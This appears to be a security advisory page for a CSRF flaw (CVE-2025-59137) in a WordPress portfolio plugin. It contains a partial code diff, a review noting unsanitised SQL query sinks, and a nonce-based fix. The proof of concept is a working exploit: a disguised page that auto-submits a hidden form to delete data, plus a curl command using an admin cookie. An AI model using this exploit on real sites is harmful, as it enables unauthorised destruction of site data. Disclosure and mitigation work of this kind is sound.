-			$onDuplicateStatement = " ON DUPLICATE KEY UPDATE catid=VALUES(catid), slug=VALUES(slug), b_project_id=VALUES(b_project_id), b_project_url=VALUES(b_project_url), b_project_name=VALUES(b_project_name), b_project_thumb=VALUES(b_project_thumb), b_creative_fields=VALUES(b_creative_fields), b_create_date=VALUES(b_create_date), b_modified_timestamp=VALUES(b_modified_timestamp) ";
-
-			$counter = ( isset($existingProjects) && !empty($existingProjects) ) ? count($existingProjects): 0;
-
-			foreach ($projects as $key => $project ) {
-
-				$category = $mappings[$project["id"]];
-
-				$b_project_thumb = '';
-
-				if(isset($project['covers']['404']) && trim($project['covers']['404']) != '')
-					$b_project_thumb = $project['covers']['404'];
-				else if (isset($project['covers']['230']) && trim($project['covers']['230']) != '')
-					$b_project_thumb = $project['covers']['230'];
-				else if (isset($project['covers']['202']) && trim($project['covers']['202']) != '')
-					$b_project_thumb = $project['covers']['202'];
-				else if (isset($project['covers']['115']) && trim($project['covers']['115']) != '')
-					$b_project_thumb = $project['covers']['115'];
-				else
-					$b_project_thumb = plugin_dir_url(__FILE__).'../images/default-project-thumb.jpg';
-
-				$b_fields ='';
-
-				foreach ($project['fields'] as $b_field){
-					$b_fields = $b_fields. ', ' . $b_field;
-				}
-
-				$project_slug = $this->get_slug("project", $project['name']);
-
-				$existingProjectId = isset($existingProjects[$project["id"]]) ? $existingProjects[$project["id"]]->id: null;
-
-				array_push($values, $existingProjectId,
-									$category,
-									$project_slug,
-									$project["id"],
-									$project["url"],
-									$project["name"],
-									$b_project_thumb,
-									substr($b_fields, 2),
-									date('Y-m-d H:i:s', $project['created_on']),
-									$project['modified_on'],
-									'',
-									'published',
-									0,
-									date("Y-m-d H:i:s", time() + ++$counter ));
-
-				$place_holders[] = "('%d','%d','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%d','%s')";
-
-			}
-
-			// Then add these bits to the initial query:
-			$query .= implode(', ', $place_holders);
-
-			$query .= $onDuplicateStatement;
-
-			if($wpdb->query( $wpdb->prepare("$query ", $values)))
-			{
-				return true;
-			} else
-			{
-				return false;
-			}
-
-		}catch(Exception $e){
-			return false;
-		}
-	}
-}
+<?php
+
+if ( ! defined( 'WPINC' ) ) {
+	die;
+}
+include_once EDS_BPM_Loader::$abs_path. '/classes/eds-bpm-behance.php';
+include_once EDS_BPM_Loader::$abs_path. '/classes/eds-bpm-config.php';
+
+if(!class_exists("EDS_BPM_DB")){
+class EDS_BPM_DB{
+
+	public function create_category_table(){
+		//Creating the category table on activation of plugin
+		global $wpdb;
+		$table_name = $wpdb->prefix . EDS_BPM_Config::$category_table;
+		if($wpdb->get_var("SHOW TABLES LIKE '$table_name'") != $table_name)
+		{
+			$sql = "CREATE TABLE $table_name (
+					  `id` integer(10) UNSIGNED NOT NULL auto_increment,
+					  `name` varchar(255) NOT NULL DEFAULT '',
+					  `slug` varchar(255) NOT NULL DEFAULT '',
+					  `icon` varchar(255) DEFAULT '',
+					  `description` text DEFAULT '',
+					  `status` varchar(20) NOT NULL DEFAULT 'unpublished',
+					  `doc` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
+
+					  PRIMARY KEY (`id`),
+					  UNIQUE KEY `idx_slug` (`slug`(100)),
+					  KEY `idx_status` (`status`),
+					  KEY `idx_doc` (`doc`)
+					) COMMENT='Portfolio Manager - Powered by Behance Categories' AUTO_INCREMENT=0;";
+			//reference to upgrade.php file
+			require_once( ABSPATH . 'wp-admin/includes/upgrade.php' );
+			dbDelta( $sql );
+		}
+	}
+
+	public function create_project_table(){
+		//Creating the project table on actiavation of plugin
+		global $wpdb;
+		$project_table_name = $wpdb->prefix. EDS_BPM_Config::$project_table;
+		$category_table_name = $wpdb->prefix. EDS_BPM_Config::$category_table;
+		if($wpdb->get_var("SHOW TABLES LIKE '$project_table_name'") != $project_table_name)
+		{
+			$sql = "CREATE TABLE $project_table_name (
+					  	`id` integer(10) UNSIGNED NOT NULL auto_increment,
+					  	`catid` integer NOT NULL default '0',
+					  	`slug` varchar (255) NOT NULL DEFAULT '',
+					  	`b_project_id`  varchar(20) NOT NULL DEFAULT '',
+					  	`b_project_url`  varchar(255) NULL DEFAULT '',
+					  	`b_project_name` varchar (255) NOT NULL DEFAULT '',
+ 					   	`b_project_thumb` varchar (255) NOT NULL DEFAULT '',
+ 						`b_creative_fields` varchar(255) NOT NULL DEFAULT '',
+ 						`b_create_date` datetime NOT NULL default '0000-00-00 00:00:00',
+ 						`b_modified_timestamp` integer NOT NULL default '0',
+ 						`params` text NOT NULL default '',
+					  	`status` varchar(20) NOT NULL DEFAULT 'unpublished',
+					  	`featured` tinyint NOT NULL default '0',
+					  	`doc` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
+					  	PRIMARY KEY (`id`),
+					  	UNIQUE KEY `idx_slug` (`slug`(100)),
+					  	KEY `idx_b_prjct_id` (`b_project_id`),
+   						KEY `idx_status` (`status`),
+   						KEY `idx_catid` (`catid`),
+					  	KEY `idx_doc` (`doc`)
+					) COMMENT='Portfolio Manager - Powered by Behance Projects' AUTO_INCREMENT=0;";
+			//reference to upgrade.php file
+			require_once( ABSPATH . 'wp-admin/includes/upgrade.php' );
+			dbDelta( $sql );
+		}
+
+	}
+
+	public function create_default_category(){
+		try{
+			glo
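Review bot: the replaced file's `-` side shows the real SQL sinks behind the category and project bulk actions: `publish_category()`, `unpublish_category()`, `delete_category()`, `trash_category()` and their project counterparts read `$_REQUEST['entries']` and splice it into `UPDATE`/`DELETE` statements through `implode(",", $ids)` with no casting, `get_category_query()` and `get_project_query()` concatenate the filter, order-by and ordering values straight into the query text, and `get_slug()` interpolates the generated slug into its `count(*)` query. The `+` side is cut off in this rendering after `create_default_category()`, so the review cannot see whether those sites changed; the patch should be checked to confirm each id is cast (`array_map( 'absint', ... )`) and the filter and slug queries go through `$wpdb->prepare()`, because the nonce check that fixes the CSRF only gates who can reach these functions, not what they do with the parameters. Likewise `save_category()` stores `$_REQUEST['cat-name']`, `cat-icon` and `cat-desc` without `sanitize_text_field()`/`esc_url_raw()`, and the `try { ... } catch ( Exception $e )` wrappers around `$wpdb` calls never fire, since `wpdb` reports failure by returning `false` rather than throwing, so the `return true` after each query hides failed writes.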

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-59137 - Behance Portfolio Manager <= 1.7.5 - Cross-Site Request Forgery

/**
 * Proof of Concept for CVE-2025-59137
 * Behance Portfolio Manager WordPress Plugin CSRF Vulnerability
 * 
 * This script demonstrates how an attacker could exploit the missing nonce validation
 * to perform unauthorized category deletion via CSRF.
 * 
 * Requirements:
 * - Target site must have Behance Portfolio Manager <= 1.7.5 installed
 * - Victim must be logged into WordPress as administrator
 * - Victim must visit the malicious page containing this exploit
 */

$target_url = 'http://vulnerable-wordpress-site.com/wp-admin/admin.php';

// CSRF payload to delete a category
$csrf_payload = array(
    'page' => 'eds-bpm-cat-menu',           // Plugin's category management page
    'action' => 'delete',                   // Vulnerable action parameter
    'category_id' => '1',                   // ID of category to delete
    'bulk-action' => '-1',                  // WordPress bulk action parameter
    'paged' => '1',                         // Pagination parameter
    's' => ''                               // Search parameter
);

// Generate the malicious HTML form
$html_form = <<<HTML
<!DOCTYPE html>
<html>
<head>
    <title>Benign Looking Page</title>
    <style>
        body { font-family: Arial, sans-serif; padding: 20px; }
        .hidden-form { display: none; }
    </style>
</head>
<body>
    <h1>Interesting Portfolio Example</h1>
    <p>This page demonstrates creative portfolio designs. Please wait while loading...</p>
    
    <!-- Hidden form that auto-submits to exploit the vulnerability -->
    <form id="csrf-exploit" class="hidden-form" method="POST" action="{$target_url}">
        <input type="hidden" name="page" value="eds-bpm-cat-menu">
        <input type="hidden" name="action" value="delete">
        <input type="hidden" name="category_id" value="1">
        <input type="hidden" name="bulk-action" value="-1">
        <input type="hidden" name="paged" value="1">
        <input type="hidden" name="s" value="">
    </form>
    
    <script>
        // Auto-submit the form after page load
        window.onload = function() {
            setTimeout(function() {
                document.getElementById('csrf-exploit').submit();
            }, 2000);
        };
    </script>
</body>
</html>
HTML;

// For demonstration purposes, we'll show the form structure
// In a real attack, this would be served as a complete HTML page
echo "CSRF Exploit Form Structure:\n";
echo "Target URL: {$target_url}\n";
echo "Payload Parameters:\n";
print_r($csrf_payload);
echo "\n\nTo exploit:\n";
echo "1. Save the HTML form above as an .html file\n";
echo "2. Host it on any web server\n";
echo "3. Trick an administrator to visit the page while logged in\n";
echo "4. The form will auto-submit and delete category ID 1\n";

// Alternative: Direct cURL demonstration (for testing)
echo "\n\nDirect cURL command for testing:\n";
$curl_cmd = "curl -X POST '" . $target_url . "' \
    -H 'Content-Type: application/x-www-form-urlencoded' \
    -d '" . http_build_query($csrf_payload) . "' \
    --cookie 'wordpress_logged_in_[hash]=[admin_cookie]'";

echo $curl_cmd . "\n";
?>
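The mitigating counterpart to the PoC above, as an added example that is neither the plugin's nor Atomic Edge's code: the admin action links carry a WordPress nonce bound to the action and category id, and the dispatcher verifies it with check_admin_referer() before any category function runs. It assumes a WordPress runtime; every eds_bpm_* function name is hypothetical.

```php
<?php
// Added example (not the plugin's code). Hardened dispatch for the admin
// category actions that a cross-site form could previously trigger.
// Assumes WordPress core functions; all eds_bpm_* names are hypothetical.

// Builds an admin action link carrying a nonce bound to action + category id.
// A page on another origin cannot learn this per-user, time-limited token,
// so a forged POST arrives without a valid eds_bpm_nonce and is rejected.
function eds_bpm_category_action_url( $action, $category_id ) {
    $category_id = absint( $category_id );
    $url = add_query_arg( array(
        'page'        => 'eds-bpm-cat-menu',
        'action'      => $action,
        'category_id' => $category_id,
    ), admin_url( 'admin.php' ) );
    return wp_nonce_url( $url, 'eds_bpm_' . $action . '_' . $category_id, 'eds_bpm_nonce' );
}

// Runs on the plugin's admin page before any category function is called.
// Returns true when an action was executed, false when none was requested.
function eds_bpm_dispatch_category_action() {
    $allowed = array( 'save', 'publish', 'unpublish', 'delete', 'trash' );
    $action  = isset( $_REQUEST['action'] ) ? sanitize_key( $_REQUEST['action'] ) : '';
    if ( ! in_array( $action, $allowed, true ) ) {
        return false;
    }
    $category_id = isset( $_REQUEST['category_id'] ) ? absint( $_REQUEST['category_id'] ) : 0;

    // Authorization (who may act): the vulnerable version already checked this.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You are not allowed to manage categories.', 'eds-bpm' ), 403 );
    }
    // Request authenticity (did this admin intend it): the missing control.
    // check_admin_referer() verifies the nonce and referer and dies with a 403
    // when the token is absent, stale or bound to a different action/id, so a
    // forged request never reaches the switch. For the 'save' form, emit the
    // matching token with wp_nonce_field( 'eds_bpm_save_' . $id, 'eds_bpm_nonce' ).
    check_admin_referer( 'eds_bpm_' . $action . '_' . $category_id, 'eds_bpm_nonce' );

    switch ( $action ) {
        case 'save':      eds_bpm_save_category( $category_id );      break;
        case 'publish':   eds_bpm_publish_category( $category_id );   break;
        case 'unpublish': eds_bpm_unpublish_category( $category_id ); break;
        case 'delete':    eds_bpm_delete_category( $category_id );    break;
        case 'trash':     eds_bpm_trash_category( $category_id );     break;
    }
    return true;
}
```

Because the nonce is derived from the logged-in user's session and expires, a page served from another origin cannot embed a working token, which is exactly what makes the auto-submitting form in the PoC fail against the patched handler.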
